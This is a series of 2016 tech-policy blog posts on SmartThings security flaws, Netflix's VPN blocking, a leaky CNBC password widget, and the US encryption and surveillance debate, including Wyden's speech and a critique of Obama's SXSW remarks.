Stop us if you've heard this one before: a new study has found that the "Internet of Things" may bring some added convenience, but at the high price of severe security vulnerabilities. Researchers at the University of Michigan say they've uncovered (pdf) some major new vulnerabilities in Samsung's SmartThings platform that could allow an attacker to unlock doors, modify home access codes, create false smoke detector alarms, or put security and automation devices into vacation mode. Researchers say this can be done by tricking users into either installing a malicious app from the SmartThings store, or by clicking a malicious link.
The URL attack relies on SmartThings' flawed implementation of the OAuth authentication protocol. In short, a malicious URL can be used to trick the consumer into giving up his login tokens without the slightest indication anything has gone wrong, but providing an attacker with the ability to create his own backdoor -- into your front door:
"Broadly, this part of the attack involves getting a victim to click on a link that points to the authentic SmartThings domain with only the redirect_uri portion of the link replaced with an attacker controlled domain. The victim should not suspect anything since the URL indeed takes the victim to the genuine HTTPS login page of SmartThings. Once the victim logs in to the real SmartThings Web page, SmartThings automatically redirects to the specified redirect URI with a 6 character codeword. At this point, the attacker can complete the OAuth flow using the codeword and the client ID and secret pair obtained from the third-party app’s bytecode independently."
If the malicious URL approach isn't used, attackers can also rely on tricking consumers into downloading a malicious app that -- for example -- might claim to offer you insight into device battery consumption, but can actually also give an attacker the keys to your kingdom. This is in part, the researchers note, due to the fact that 42% of over 500 apps in the SmartThings store are are given significantly more system privileges than they actually need to accomplish the task at hand:
"We found that SmartApps were significantly overprivileged: (a) 55% of SmartApps did not use all the rights to device operations that their requested capabilities implied; and (b)
42% of SmartApps were granted capabilities that were not explicitly requested or used. In many of these cases, overprivilege was unavoidable, due to the device-level authorization design of the capability model and occurred through no fault of the developer. Worryingly, we have observed that 68 existing SmartApps are already taking advantage of the overprivilege to provide extra features, without requesting the relevant capabilities.
"The potential vulnerabilities disclosed in the report are primarily dependent on two scenarios - the installation of a malicious SmartApp or the failure of third party developers to follow SmartThings guidelines on how to keep their code secure," a SmartThings representative said. "Following this report, we have updated our documented best practices to provide even better security guidance to developers."
The problem is the report clearly notes that neither of these two scenarios is all that unlikely. In an admittedly small survey of 22 SmartThings users, the study found that 91% would let a battery monitoring app check the status of their smart lock. But quite justly, just 14% of those polled believed that providing such access would somehow involve the app being able to send door access codes to a remote server. The study, and Samsung's reaction to it, are just another example of how if you really want a smart and secure home, "dumber" solutions -- like dead bolts and a dog -- remain the more intelligent option.
When Netflix recently expanded into 190 different countries, we noted that the company ramped up its efforts to block customers that use VPNs to watch geo-restricted content. More accurately, Netflix stepped up its efforts to give the illusion it seriously cracks down on VPN users, since the company has basically admitted that trying to block such users is largely impossible since they can just rotate IP addresses and use other tricks to avoid blacklists. And indeed, that's just what most VPN providers did, updating their services so they still work despite the Netflix crackdown.
Netflix's frankly over-stated "crackdown" is an effort to soothe international broadcasters, justly worried about licensing content to a company that is demolishing decades-old broadcasting power centers. But even superficial as it may be, Netflix's crackdown on VPNs still managed to erode user privacy and security, since obviously there are countless people using VPNs for reasons other than engaging in global Netflix tourism.
There was uproar from customers, some of which simply use VPNs to protect their privacy, with a petition calling for the ban to be lifted attracting over 40,000 signatures. But it seems Netflix, which generally cherishes its user experience, doesn’t seem fussed by this uprising.
“It’s a very small but quite vocal minority,” CEO Reed Hastings said during this week’s earnings call. “So it’s really inconsequential to us, as you could see in the Q1 results.”
And, if looking solely at growth, he's not wrong; the company reported that it now serves 81.5 million members, 42% of whom are now outside of the United States. That's 44,740,000 TV subscribers in the States alone, double Comcast's latest tally of 22,347,000 TV customers. While investors are worried about growing competition from Amazon and grandfathered customers' reaction to next-month's price hike (actually announced two years ago), most customers, VPN or otherwise, aren't leaving.
And while Netflix may be annoying some VPN users now, the company has repeatedly stated that its ultimate goal is to eliminate geographic broadcast restrictions entirely. That not only makes it so Netflix tourism is unnecessary, but it should reduce piracy -- something Netflix Chief Product Officer Neil Hunt reiterated earlier this year at CES:
“Our ambition is to do global licensing and global originals, so that over maybe the next five, 10, 20 years, it’ll become more and more similar until it’s not different”... “We don’t buy only for Canada; we’re looking… for all territories; buying a singular territory is not very interesting any more.... When we have global rights, there’s a significant reduction in piracy pressure on that content. If a major title goes out in the U.S. but not in Europe, it’s definitely pirated in Europe, much more than it is if it’s released simultaneously,” Mr. Hunt says.
In other words Netflix's long-term vision may be to eliminate fractured broadcast licensing so users don't need to use VPNs. But in the short term Netflix should probably try a little harder to avoid alienating its more technically savvy customers. They may be "inconsequential" now during Netflix's heyday, but may prove important once Netflix's streaming battle against Amazon, Hulu, Apple, and countless other companies starts to heat up.
People's passwords and their relative strength and weakness is a subject I know quite well. As part of my business, we regularly battle users who think very simple passwords, often times relating to their birthdays and whatnot, are sufficient. Sometimes they simply make "password" or a similiar variant their go-to option. So, when CNBC put together a widget for readers to input the passwords they use to get feedback on their strength or weakness, I completely understand what they were attempting to accomplish. Password security is a real issue, after all -- which is what makes it all the more face-palming that the widget CNBC used was found to be exploitable.
A columnist for CNBC’s The Big Crunch tried to make a misguided point about the FBI’s iPhone situation with an interactive tool that asked readers to input their password to see how secure they were. The post is now down, but if you did comply with the CNBC request, it might be a good idea to change your password. A few people on Twitter claimed the widget is an insecure form that actually submits the characters you enter into the text field to third parties.
Since it’s a form field, it reloads the page when you hit “enter,” changing the url and, in effect, saving the password you just typed in.
“In theory, if there’s someone sniffing traffic on your network, they could see these urls being requested in plain text, and then try sniffing on other traffic coming from you that might indicate some account information,” [Gawker Media's Adam] Pash told me. This could be as easy as finding out your email address. And it wouldn’t be hard for these ad trackers to collect a bunch of people’s passwords in their logs.
So while CNBC’s cool tool is not necessarily malicious, it’s more just sloppy. “I’m not sure it’s a serious threat,” says Pash. “But it’s definitely dumb.”
Dumb in general, yes, but all the more dumb specifically as the widget was created to educate readers on password security, while it simultaneously opened up a security threat vector upon those same readers. This is the kind of thing that is almost too hysterical to be true. The very concept of attempting to educate the public about password security by developing an online widget and asking them to input their passwords is hilariously self-contradicting. Whatever the list of password do's and don'ts are, that list must certainly include something about not simply typing your passwords into online search fields for fun. Add to this that CNBC didn't use HTTPS, and it's starting to get difficult to see what its widget did right on matters of security.
And, if the social media accusations are true and CNBC was indeed sharing data with third parties, including the passwords that users were inputting into the widget, then this goes from laugh-inducing to dumpster fire fairly quickly. And, keep in mind that all of this was done supposedly to educate readers about password security. For CNBC to then start sharing those passwords with third parties? That kind of thing earns you an IT death sentence.
CNBC apparently realized its mistake and took the widget down, but not before teaching its readers a valuable security lesson, albeit not the one it had intended to teach: Don't put your passwords into an online widget, no matter who put it up. That's just dumb.
Yesterday, at the excellent RightsCon event in San Francisco, Senator Ron Wyden gave a barn burner of a speech, in which he detailed why it was so important to protect our privacy and security in a digital age, at a time when law enforcement and the intelligence communities are digging deeper and deeper into all of our personal information. He started out with a clear and emphatic statement on how he will block any attempt by Congress to undermine encryption:
I am here to tell you why I will use every power I have as a senator to block plans to weaken strong encryption. I am here to tell you why FBI Director Comey’s plans and expected legislation will be a lose-lose - they would lead to less security and less liberty
Furthermore, he made it clear that anyone who says that this just a debate between privacy and security has it totally wrong:
And let me be clear at the outset that the debate about data security is not about choosing security or choosing privacy. It is about choosing less security or choosing more security. People who think that the government should have more surveillance powers will often try to frame this debate as a choice between privacy and security. They are wrong. Our job is to convince the public that when politicians or the news media say that, we are here to tell you it’s not the case. It’s less security versus more security.
He further pointed out that, contrary to the claims of James Comey and others in law enforcement, this is the "golden age of surveillance" in that modern technologies have given law enforcement much more access to private information than they've ever had before. And he compared the freakout claims from law enforcement to similar claims 50 years ago, when the Supreme Court ruled in Miranda v. Arizona that law enforcement had to read people their rights -- and law enforcement and the media insisted this would lead to much more criminal activity:
I think that it is useful to compare this discussion to another one that was playing out fifty years ago. Fifty years ago this summer, the Supreme Court handed down a landmark decision in the case of Miranda vs. Arizona, in which the Court ruled that before law enforcement officers interrogate a suspect, they must advise that person of his or her constitutional rights. Everyone who’s ever watched a TV cop show knows this – you have the right to remain silent, you have the right to an attorney, and so forth. Today, this is a very important feature of the American justice system. It helps ensure that poor people know that they have the same rights under the law as rich people who can afford high-priced lawyers. And it helps reduce the likelihood of innocent people who are unsure about their rights being pressured to sign false confessions. The Miranda ruling helped bring our country closer to the promise of equal justice for all.
But if you had been following the public debate back in the summer of 1966, you would have heard a lot of politicians and prosecutors saying that the sky was falling. A few weeks after the decision, a New York Times headline read “Miranda Decision Said to End Effective Use of Confessions.” The article quoted some of the most respected prosecutors and law enforcement officials in the country warning that this decision was an absolute catastrophe. Future president Richard Nixon called the ruling a “Dickensian legalism” that would “hamstring” law enforcement, and he even suggested that the Constitution should be amended to overturn it.
Needless to say, the sky did not fall. In fact, crime rates have been dropping for the past twenty or thirty years. The national murder rate and burglary rate are both lower than they were the day that the Miranda ruling was handed down. Obviously there are a lot of factors that go into crime rates, but I think it’s clear that despite all of the dire warnings from both politicians and respected law enforcement officials, this ruling did not lead to the end of law enforcement in America. Fifty years later, the Miranda ruling remains a cornerstone of American due process.
Protecting strong encryption to safeguard Americans’ private data. Wyden’s Secure Data Act would ban the government from forcing companies to build backdoors or otherwise weaken the security of their products.
Overhauling the Third Party Doctrine to make clear individuals do not lose their privacy rights just because they share some of their personal information with a particular company.
Increasing transparency by holding at least three congressional hearings each year on the privacy impacts of surveillance laws, authorities and practices.
Being on high alert for fresh attempts to undermine checks on government power. Right now the Justice Department is seeking a change to the rules for getting warrants to track computer hackers that would allow DOJ to use a single warrant to remotely access any computer that a suspected hacker is believed to have broken into. This rule change could potentially allow federal investigators to use a single warrant to access millions of computers, and it would treat the victims of the hack the same as the hacker himself.
Finally, the government must do much more to hire people who understand technology and the implications of weakening digital security and privacy.
He spent some time in his speech blasting the concept of the third party doctrine and how ridiculous it is in practice:
Here’s the problem. A few decades ago, courts began ruling that if you provide information to a third party, like your bank or your phone company, you are no longer keeping it private, and it is no longer protected under the Fourth Amendment to the Constitution.
There is a huge, glaring problem with that logic. When you share your information with a single private company, that is not the same thing as making it public. Your phone company may have records of who you call, and your bank may have records of how you spend your money, but your contract with them will have rules for when and how they are allowed to share that information. They are not allowed to just disclose it freely.
This is true in the digital world as well. When I post a handsome new profile picture on Facebook, or send out a tweet to tell people that I’m holding a town hall in Oregon, I’ve chosen to make that information public. But when I send an email to my wife, or store a document in the cloud so I can work on it later, my service provider and I have an agreement that my information will stay private. The premise in current law is that I have agreed to make that information public just because my service provider is holding it. And that premise is simply absurd.
It's yet another great speech on an important topic from Senator Wyden -- and he includes a call to action to get people who support this vision to speak out on it. As it stands right now there are a few others in Congress who get how important all of this is, but many do not. And that needs to change. And while many people will be quite cynical about this and say that we'll never get others in Congess to recognize this issue, Senator Wyden reminded everyone that many people had the same view about SOPA/PIPA and the public eventually shifted Congress' position on that as well:
We can win this fight for security and liberty. It obviously won’t be easy, but we’ve done it before. Remember in the January of 2012, we were talking about the anti-Internet SOPA and PIPA bills. The first vote was on whether to override my hold on PIPA. Talk about long odds. The Chamber of Commerce, Hollywood, all the powerful special interests were against us. When that debate started, no one gave us a chance. Then the Internet community mobilized. Websites went dark in protest. And when the dust settled, well, everyone here knows how that ended. We won. Let’s work together and do it again.
While I do worry about the tendency of some to always roll out the "SOPA example" as proof, it is true that when enough people speak up, all the lobbyists and money in the world can be defeated. And this is a time when it would be nice to see that happen again.
from the another-security-theater-script-rewrite-in-the-works dept
Another terrorist attack somewhere in the world* has provoked another round of punditry from former government officials on how to protect America from future attacks. Over the coming weeks, there will be no shortage of stupid ideas, useless ideas and pointless discussions about "heightened security" at any place people gather.
*"World" = Western Europe only
None of it will matter. Security has never really been scaled back anywhere since the 9/11 attacks -- certainly not to the levels seen prior to September 2001. There's only so much security anyone can actually provide but endless off-Broadway productions of security theater to be explored.
“Well I have to say this is something I’ve spoken to people about for some time. The actual portion of the airport before the checkpoint is not really controlled by the federal government, it’s controlled by the local authorities. And it has increasingly become vulnerable, because as people wait to go through security they actually congregate there.”
I'm not sure the local boys will appreciate this dig at their security skills. But Chertoff's "solution" is just a literal expansion of federal government territory.
“And so now there’s an effort I think on the part of TSA to start to move the airports into pushing the security envelope back. We’ve seen some of that in terms of not allowing you to park in front of the terminal, but I think we’re going to have to step that up.”
So… move the target. Instead of being deep inside the airport, it will be closer to the entrance. As Gawker's Alex Pareene notes, at some point you can't push the envelope back any further. And there's no expansion point that will magically protect fliers from terrorist attacks.
Ah. Of course. We’ll “push the security envelope back.” The old checkpoints created crowds, sure, but once we move the security checkpoints back, just a bit bit further (to just before you enter the airport, I guess), it will be much safer for everyone, at least once everyone gets past the new checkpoints. Maybe eventually we can push the security envelope back to before you get in your car to go to the airport—your garage door, maybe?
Push people closer to the entrance. Make them more vulnerable to car bombs/larger groups of attackers. Push the envelope all the way out to the connecting roads. Same problem but with the added bonus of intrusive vehicle searches for everyone heading to the airport, whether they're planning to fly or not. There's no point where traveler safety suddenly spikes. Every nudge of the envelope opens as many attack vectors as it shuts down.
That's the ridiculousness of the TSA. It has done almost nothing to make flying safer. The only thing anyone can say for sure is that the TSA has made flying more annoying.
Maybe they'll move the checkpoints. Maybe they won't. Airplanes aren't the target. People are. And people are everywhere. To paraphrase Abraham Lincoln, you can't save all of the people all of the time, but you can make most of them miserable most of the time. That's how the DHS works. Actions must always be followed by reactions specifically tailored to address the parameters of the last attack or perceived threat. Somehow, we'll be safer by staying one step behind and ceding control to the government.
The unintended but entirely predictable consequences from the UK's disastrous Counter-Terrorism and Security Act keep on a-coming. You will recall that this handy piece of legislation tasked teachers with weeding out possible future-terrorists amongst the young folks they are supposed to be teaching. This has devolved instead into teachers reporting children, usually children that would be peripherally identified as Muslim children, to the authorities for what aren't so much as transgressions as they are kids being kids. It has even turned some teachers into literal grammar police, because the universe is not without a sense of humor.
And now we learn that these part-teacher-part-security-agents may be incorporating art criticism into their repertoire, having reported a young Muslim boy of four years old to the authorities because of his inability to properly illustrate a cucumber.
Concerns were raised after the youngster drew a picture of a man cutting the vegetable. [The child's mother] said she feared her children would be taken away from her and added: 'But I haven't done anything wrong... It was a horrible day." Teachers and public service workers have a legal obligation to report any concerns of extremist behaviour to the authorities since July.
And here is the picture the child drew of himself cutting a cucumber.
Now, if we hold our nose and choose to forget for a moment that this is a four year old we're talking about, and not the re-animated corpse of Vincent Van Gogh, we might all agree that the picture on the left looks like a person holding a giant freaking sword, instead of a kitchen knife. The picture on the right will look like pretty much anything you want it to look like because, again, this is a four year old toddler we're talking about. So, it appears the teachers asked the child what he was attempting to draw in the picture, and the response would have been benign, except it hit one of the terrorism buzz-words, kinda sorta.
Staff in Luton told the child's mother they believed he was saying "cooker bomb" instead of "cucumber".
"[The member of staff] kept saying it was this one picture of the man cutting the cucumber....which she said to me is a 'cooker bomb', and I was baffled," she told the BBC Asian Network.
So the child, in addition to being unable to draw a cucumber sufficiently to get teachers to understand the portrayal he was attempting, also wasn't able to properly pronounce the word cucumber, and it apparently came out of his mouth close enough to "cooker bomb" for the nursery staff to freak out and into the de-radicalization program the child goes. I can't stress enough that this child is four years old.
Nor that the staff's interpretations here don't make any sense. So they believed the child was saying he was sawing into a cooker bomb with a death-sword? And that's a more plausible scenario than the staff concluding that this toddler was doing something completely innocent and wasn't articulating properly?
One wonders, as always, just how much leeway would have been afforded the boy if he had pale skin and blue eyes.
The US government has made numerous attempts to obtain source code from tech companies in an effort to find security flaws that could be used for surveillance or investigations.
The government has demanded source code in civil cases filed under seal but also by seeking clandestine rulings authorized under the secretive Foreign Intelligence Surveillance Act (FISA), a person with direct knowledge of these demands told ZDNet. We're not naming the person as they relayed information that is likely classified.
With these hearings held in secret and away from the public gaze, the person said that the tech companies hit by these demands are losing "most of the time."
That's hardly heartening. The DOJ would only go so far as to confirm this has happened before, likely because there's no way to deny it. The documents from the Lavabit case have been made public -- with the DOJ using a formerly-sealed document to hint at what could be in store for Apple if it refuses to write FBiOS for it.
Unfortunately, because of the secrecy surrounding the government's requests for source code -- and the court where those requests have been made -- it's extremely difficult to obtain outside confirmation. Whittaker contacted more than a dozen Fortune 500 companies about the unnamed official's claims and received zero comments.
A few, however, flatly denied ever having handed over source code to the US government.
Cisco said in an emailed statement: "We have not and we will not hand over source code to any customers, especially governments."
IBM referred to a 2014 statement saying that the company does not provide "software source code or encryption keys to the NSA or any other government agency for the purpose of accessing client data." A spokesperson confirmed that the statement is still valid, but did not comment further on whether source code had been handed over to a government agency for any other reason.
Cisco is likely still stinging from leaked documents showing its unwitting participation in an NSA unboxing photo shoot and has undoubtedly decided to take a stronger stance against government meddling since that point. As for IBM, its statement is a couple of years old and contains a major qualifying statement.
Previously-leaked documents somewhat confirm the existence of court orders allowing the NSA to perform its own hardware/software surgery. Presumably, the introduction of backdoors and exploits is made much easier with access to source code. Whittaker points to a Kaspersky Lab's apparent discovery of evidence pointing to the NSA being in possession of "several hard drive manufacturers'" source code -- another indication that the government's history of demanding source code from manufacturers and software creators didn't begin (or end) with Lavabit.
The government may be able to talk the FISA court into granting these requests, given that its purview generally only covers foreign surveillance (except for all the domestic dragnets and "inadvertent" collections) and national security issues. The FBI's open air battle with Apple has already proceeded far past the point that any quasi-hearing in front of the FISC would have. That's the sort of thing an actually adversarial system -- unlike the mostly-closed loop of the FISA court -- tends to result in: a give-and-take played out (mostly) in public, rather than one party saying "we need this" and the other applying ink to the stamp.
In all the discussions about Apple v. the FBI, a few people occasionally ask what would happen if Apple's engineers just refused to write the code demanded (some also ask about writing the code, but purposely messing it up). And now it appears that at least some Apple engineers are thinking about just this scenario. According to the NY Times:
Apple employees are already discussing what they will do if ordered to help law enforcement authorities. Some say they may balk at the work, while others may even quit their high-paying jobs rather than undermine the security of the software they have already created, according to more than a half-dozen current and former Apple employees.
As the NY Times notes, these details certainly add some pretty hefty weight to the First Amendment arguments about "compelled speech" that Apple has made (and that the EFF doubled down on in its amicus brief). As for what then would happen... that's up to the court, but it's likely that the court would find Apple in contempt and/or start fining it. But that still leaves open the question of how does it comply if not a single engineer is willing to help out.
This particular legal dispute gets more interesting day by day...
Not surprisingly, Oliver's take is much clearer and much more accurate than many mainstream press reports on the issues in the case, appropriately mocking the many law enforcement officials who seem to think that, just because Apple employs smart engineers, they can somehow do the impossible and "safely" create a backdoor into an encrypted iPhone that won't have dangerous consequences. He even spends a bit of time reviewing the original Crypto Wars over the Clipper Chip and highlights cryptographer Matt Blaze's contribution in ending those wars by showing that the Clipper Chip could be hacked.
But the biggest contribution to the debate -- which I hope that people pay most attention to -- is the point that Oliver made in the end with his faux Apple commercial. Earlier in the piece, Oliver noted that this belief among law enforcement that Apple engineers can somehow magically do what they want is at least partially Apple's own fault, with its somewhat overstated marketing. So, Oliver's team made a "more realistic" Apple commercial which noted that Apple is constantly fighting security cracks and vulnerabilities and is consistently just half a step ahead of hackers with malicious intent (and, in many cases, half a step behind them).
This is the key point: Building secure products is very, very difficult and even the most secure products have security vulnerabilities in them that need to be constantly watched and patched. And what the government is doing here is not only asking Apple to not patch a security vulnerability that it has found, but actively forcing Apple to make a new vulnerability and then effectively forcing Apple to keep it open. For all the talk of how Apple can just create the backdoor just this once and throw it away, this more like asking Apple to set off a bomb that blows the back off all houses in a city, and then saying, "okay, just throw away the bomb after you set it off."
Hopefully, as in cases like net neutrality, Oliver's piece does it's job in informing the public what's really going on.
This is not all that surprising, but President Obama, during his SXSW keynote interview, appears to have joined the crew of politicians making misleading statements pretending to be "balanced" on the question of encryption. The interview (the link above should start at the very beginning) talks about a variety of issues related to tech and government, but eventually the President zeroes in on the encryption issue. The embed below should start at that point (if not, it's at the 1 hour, 16 minute mark in the video). Unfortunately, the interviewer, Evan Smith of the Texas Tribune, falsely frames the issue as one of "security v. privacy" rather than what it actually is -- which is "security v. security."
In case you can't watch that, the President says he won't comment directly on the Apple legal fights, but then launches into the standard politician talking point of "yes, we want strong encryption, but bad people will use it so we need to figure out some way to break in."
If you watch that, the President is basically doing the same thing as all the Presidential candidates, stating that there's some sort of equivalency on both sides of the debate and that we need to find some sort of "balanced" solution short of strong encryption that will somehow let in law enforcement in some cases.
This is wrong. This is ignorant.
To his at least marginal credit, the President (unlike basically all of the Presidential candidates) did seem to acknowledge the arguments of the crypto community, but then tells them all that they're wrong. In some ways, this may be slightly better than those who don't even understand the actual issues at all, but it's still problematic.
Let's go through this line by line.
All of us value our privacy. And this is a society that is built on a Constitution and a Bill of Rights and a healthy skepticism about overreaching government power. Before smartphones were invented, and to this day, if there is probable cause to think that you have abducted a child, or that you are engaging in a terrorist plot, or you are guilty of some serious crime, law enforcement can appear at your doorstep and say 'we have a warrant to search your home' and they can go into your bedroom to rifle through your underwear to see if there's any evidence of wrongdoing.
Again, this is overstating the past and understating today's reality. Yes, you could always get a warrant to go "rifle through" someone's underwear, if you could present probable cause that such a search was reasonable to a judge. But that does not mean that the invention of smartphones really changed things so dramatically as President Obama presents here. For one, there has always been information that was inaccessible -- such as information that came from an in-person conversation or information in our brains or information that has been destroyed.
In fact, as lots of people have noted, today law enforcement has much more recorded evidence that it can obtain, totally unrelated to the encryption issue. This includes things like location information or information on people you called. That information used to not be available at all. So it's hellishly misleading to pretend that we've entered some new world of darkness for law enforcement when the reality is that the world is much, much brighter.
And we agree on that. Because we recognize that just like all our other rights, freedom of speech, freedom of religion, etc. there are going to be some constraints that we impose in order to make sure that we are safe, secure and living in a civilized society. Now technology is evolving so rapidly that new questions are being asked. And I am of the view that there are very real reasons why we want to make sure that government cannot just willy nilly get into everyone's iPhones, or smartphones, that are full of very personal information and very personal data. And, let's face it, the whole Snowden disclosure episode elevated people's suspicions of this.
That was a real issue. I will say, by the way, that -- and I don't want to go to far afield -- but the Snowden issue, vastly overstated the dangers to US citizens in terms of spying. Because the fact of the matter is that actually that our intelligence agencies are pretty scrupulous about US persons -- people on US soil. What those disclosures did identify were excesses overseas with respect to people who are not in this country. A lot of those have been fixed. Don't take my word for it -- there was a panel that was constituted that just graded all the reforms that we set up to avoid those charges. But I understand that that raised suspicions.
Again, at least some marginal kudos for admitting that this latest round was brought on by "excesses" (though we'd argue that it was actually unconstitutional, rather than mere overreach). And nice of him to admit that Snowden actually did reveal such "excesses." Of course, that raises a separate question: Why is Obama still trying to prosecute Snowden when he's just admitted that what Snowden did was clearly whistleblowing, in revealing questionable spying?
Also, the President is simply wrong that it was just about issues involving non-US persons. The major reform that has taken place wasn't about US persons at all, but rather about Section 215 of the PATRIOT Act, which was used almost entirely on US persons to collect all their phone records. So it's unclear why the President is pretending otherwise. The stuff outside of the US is governed by Executive Order 12333, and there's been completely no evidence that the President has changed that at all. I do agree, to some extent, that many do believe in an exaggerated view of NSA surveillance, and that's distracting. But the underlying issues about legality and constitutionality -- and the possibilities for abuse -- absolutely remain.
But none of that actually has to do with the encryption fight, beyond the recognition -- accurately -- that the government's actions, revealed by Snowden, caused many to take these issues more seriously. And, on that note, it would have been at least a little more accurate for the President to recognize that it wasn't Snowden who brought this on the government, but the government itself by doing what it was doing.
So we're concerned about privacy. We don't want government to be looking through everybody's phones willy-nilly, without any kind of oversight or probable cause or a clear sense that it's targeted who might be a wrongdoer.
What makes it even more complicated is that we also want really strong encryption. Because part of us preventing terrorism or preventing people from disrupting the financial system or our air traffic control system or a whole other set of systems that are increasingly digitalized is that hackers, state or non-state, can just get in there and mess them up.
So we've got two values. Both of which are important.... And the question we now have to ask is, if technologically it is possible to make an impenetrable device or system where the encryption is so strong that there's no key. There's no door at all. Then how do we apprehend the child pornographer? How do we solve or disrupt a terrorist plot? What mechanisms do we have available to even do simple things like tax enforcement? Because if, in fact, you can't crack that at all, government can't get in, then everybody's walking around with a Swiss bank account in their pocket. So there has to be some concession to the need to be able get into that information somehow.
The answer to those questions in that final paragraph are through good old fashioned detective work. In a time before smartphones, detectives were still able to catch child pornographers or disrupt terrorist plots. And, in some cases, the government failed to stop either of those things. But it wasn't because strong enforcement stymied them, but because there are always going to be some plots that people are able to get away with. We shouldn't undermine our entire security setup just because there are some bad people out there. In fact, that makes us less safe.
Also: tax enforcement? Tax enforcement? Are we really getting to the point that the government wants to argue that we need to break strong encryption to better enforce taxes? Really? Again, there are lots of ways to go after tax evasion. And, yes, there are lots of ways that people and companies try to hide money from the IRS. And sometimes they get away with it. To suddenly say that we should weaken encryption because the IRS isn't good enough at its job just seems... crazy.
Now, what folks who are on the encryption side will argue, is that any key, whatsoever, even if it starts off as just being directed at one device, could end up being used on every device. That's just the nature of these systems. That is a technical question. I am not a software engineer. It is, I think, technically true, but I think it can be overstated.
This is the part that's most maddening of all. He almost gets the point right. He almost understands. The crypto community has been screaming from the hills for ages that introducing any kind of third party access to encryption weakens it for all, introducing vulnerabilities that ensure that those with malicious intent will get in much sooner than they would otherwise. The President is mixing up that argument with one of the other arguments in the Apple/FBI case, about whether it's about "one phone" or "all the phones."
But even assuming this slight mixup is a mistake, and that he does recognize the basics of the arguments from the tech community, to have him then say that this "can be overstated" is crazy. A bunch of cryptography experts -- including some who used to work for Obama -- laid out in a detailed paper the risks of undermining encryption. To brush that aside as some sort of rhetorical hyperbole -- to brush aside the realities of cryptography and math -- is just crazy.
Encryption expert Matt Blaze (whose research basically helped win Crypto War 1.0) responded to this argument by noting that the "nerd harder, nerds" argument fundamentally misunderstands the issue:
Figuring out how to build the reliable, secure systems required to "compromise" on crypto has long been a central problem in CS.
If you can't read that, Blaze is basically saying that all crypto includes backdoors -- they're known as vulnerabilities. And the key focus in crypto is closing those backdoors, because leaving them open is disastrous. And yet the government is now demanding that tech folks purposely put in more backdoors and not close them, without recognizing the simple fact that vulnerabilities in crypto always lead to disastrous results.
So the question now becomes that, we as a society, setting aside the specific case between the FBI and Apple, setting aside the commercial interests, the concerns about what could the Chinese government do with this, even if we trust the US government. Setting aside all those questions, we're going to have to make some decisions about how do we balance these respective risks. And I've got a bunch of smart people, sitting there, talking about it, thinking about it. We have engaged the tech community, aggressively, to help solve this problem. My conclusions so far is that you cannot take an absolutist view on this. So if your argument is "strong encryption no matter what, and we can and should in fact create black boxes," that, I think, does not strike the kind of balance that we have lived with for 200, 300 years. And it's fetishizing our phones above every other value. And that can't be the right answer.
This is not an absolutist view. It is not an absolutist view to say that anything you do to weaken the security of phones creates disastrous consequences for overall security, far beyond the privacy of individuals holding those phones. And, as Julian Sanchez rightly notes, it's ridiculous that it's the status quo on the previous compromise that is now being framed as an "absolutist" position:
CALEA--with obligations on telecoms to assist, but user-side encryption protected--WAS the compromise. Now that's "absolutism".
Also, the idea that this is about "fetishizing our phones" is ridiculous. No one is even remotely suggesting that. No one is even suggesting -- as Obama hints -- that this is about making phones "above and beyond" what other situations are. It's entirely about the nature of computer security and how it works. It's about the risks to our security in creating deliberate vulnerabilities in our technologies. To frame that as "fetishizing our phones" is insulting.
There's a reason why the NSA didn't want President Obama to carry a Blackberry when he first became President. And there's a reason the President wanted a secure Blackberry. And it's not because of fetishism in any way, shape or form. It's because securing data on phones is freaking hard and it's a constant battle. And anything that weakens the security puts people in harm's way.
I suspect that the answer is going to come down to how do we create a system where the encryption is as strong as possible. The key is as secure as possible. It is accessible by the smallest number of people possible for a subset of issues that we agree are important. How we design that is not something that I have the expertise to do. I am way on the civil liberties side of this thing. Bill McCraven will tell you that I anguish a lot over the decisions we make over how to keep this country safe. And I am not interested in overthrowing the values that have made us an exceptional and great nation, simply for expediency. But the dangers are real. Maintaining law and order and a civilized society is important. Protecting our kids is important.
You suspect wrong. Because while your position sounds reasonable and "balanced" (and I've seen some in the press describe President Obama's position here as "realist"), it's actually dangerous. This is the problem. The President is discussing this like it's a political issue rather than a technological/math issue. People aren't angry about this because they're "extremists" or "absolutists" or people who "don't want to compromise." They're screaming about this because "the compromise" solution is dangerous. If there really were a way to have strong encryption with a secure key where only a small number of people could get in on key issues, then that would be great.
But the key point that all of the experts keep stressing is: that's not reality. So, no the President's not being a "realist." He's being the opposite.
So I would just caution against taking an absolutist perspective on this. Because we make compromises all the time. I haven't flown commercial in a while, but my understanding is that it's not great fun going through security. But we make the concession because -- it's a big intrusion on our privacy -- but we recognize that it is important. We have stops for drunk drivers. It's an intrusion. But we think it's the right thing to do. And this notion that somehow our data is different and can be walled off from those other trade-offs we make, I believe is incorrect.
Again, this is not about "making compromises" or some sort of political perspective. And the people arguing for strong encryption aren't being "absolutist" about it because they're unwilling to compromise. They're saying that the "compromise" solution means undermining the very basis of how we do security and putting everyone at much greater risk. That's ethically horrific.
And, also, no one is saying that "data is different." There has always been information that is "walled off." What people are saying is that one consequence of strong encryption is that it has to mean that law enforcement is kept out of that information too. That does not mean they can't solve crimes in other ways. It does not mean that they don't get access to lots and lots of other information. It just means that this kind of content is harder to access, because we need it to be harder to access to protect everyone.
It's not security v. privacy. It's security v. security, where the security the FBI is fighting for is to stop the 1 in a billion attack and the security everyone else wants is to prevent much more likely and potentially much more devastating attacks.
Meanwhile, of all the things for the President to cite as an analogy, TSA security theater may be the worst. Very few people think it's okay, especially since it's been shown to be a joke. Setting that up as the precedent for breaking strong encryption is... crazy. And, on top of that, using the combination of TSA security and DUI checkpoints as evidence for why we should break strong encryption with backdoors again fails to recognize the issue at hand. Neither of those undermine an entire security setup.
We do have to make sure, given the power of the internet and how much our lives are digitalized, that it is narrow and that it is constrained and that there's oversight. And I'm confident this is something that we can solve, but we're going to need the tech community, software designers, people who care deeply about this stuff, to help us solve it. Because what will happen is, if everybody goes to their respective corners, and the tech community says "you know what, either we have strong perfect encryption, or else it's Big Brother and Orwellian world," what you'll find is that after something really bad happens, the politics of this will swing and it will become sloppy and rushed and it will go through Congress in ways that have not been thought through. And then you really will have dangers to our civil liberties, because the people who understand this best, and who care most about privacy and civil liberties have disengaged, or have taken a position that is not sustainable for the general public as a whole over time.
I have a lot of trouble with the President's line about everyone going to "their respective corners," as it suggests a ridiculous sort of tribalism in which the natural state is the tech industry against the government and even suggests that the tech industry doesn't care about stopping terrorism or child pornographers. That, of course, is ridiculous. It's got nothing to do with "our team." It has to do with the simple realities of encryption and the fact that what the President is suggesting is dangerous.
